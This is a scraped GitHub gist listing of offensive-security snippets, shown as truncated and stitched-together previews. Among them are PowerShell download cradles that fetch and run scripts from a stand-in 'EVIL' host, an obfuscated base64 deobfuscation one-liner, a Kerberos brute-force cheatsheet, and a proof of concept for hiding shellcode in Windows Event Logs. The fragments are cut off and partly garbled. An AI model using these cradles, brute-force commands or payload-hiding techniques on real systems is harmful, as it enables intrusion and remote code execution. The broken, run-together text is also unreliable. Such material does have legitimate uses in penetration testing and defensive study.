
@davehardy20
davehardy20 / checkmk.py
Created August 3, 2022 06:49 — forked from rqu1/checkmk.py
Check if a PAN firewall is using the default master key when GlobalProtect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'
class PanCrypt():
site.com/file.php
response = nothing
http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours,
@davehardy20
davehardy20 / kerberos_attacks_cheatsheet.md
Created May 13, 2022 06:56 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@davehardy20
davehardy20 / EventLogInject.cs
Created May 9, 2022 16:17
POC to inject and extract shellcode from Windows Event Logs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace HiddenEventLogs
{
@davehardy20
davehardy20 / Download-Cradles-Oneliners.md
Created February 17, 2021 11:05 — forked from mgeeky/Download-Cradles-Oneliners.md
Various PowerShell download cradles intended as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor, useful for dynamic string deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
@davehardy20
davehardy20 / DownloadCradles.ps1
Created February 17, 2021 11:04 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@davehardy20
davehardy20 / JavascriptRecon.md
Created January 28, 2021 16:11
My JavaScript Recon Process - BugBounty

Description

This is a simple guide to performing JavaScript recon in bug bounty work.

Steps

  • The first step is to collect as many JavaScript files as possible (more files = more paths and parameters -> more vulns)
@davehardy20
davehardy20 / DisplayImage.ps1
Created January 27, 2021 22:36 — forked from zippy1981/DisplayImage.ps1
Display an image from Windows PowerShell
# Loosely based on http://www.vistax64.com/powershell/202216-display-image-powershell.html
[void][reflection.assembly]::LoadWithPartialName("System.Windows.Forms")
$file = (get-item 'C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg')
#$file = (get-item "c:\image.jpg")
$img = [System.Drawing.Image]::Fromfile($file);
# This tip from http://stackoverflow.com/questions/3358372/windows-forms-look-different-in-powershell-and-powershell-ise-why/3359274#3359274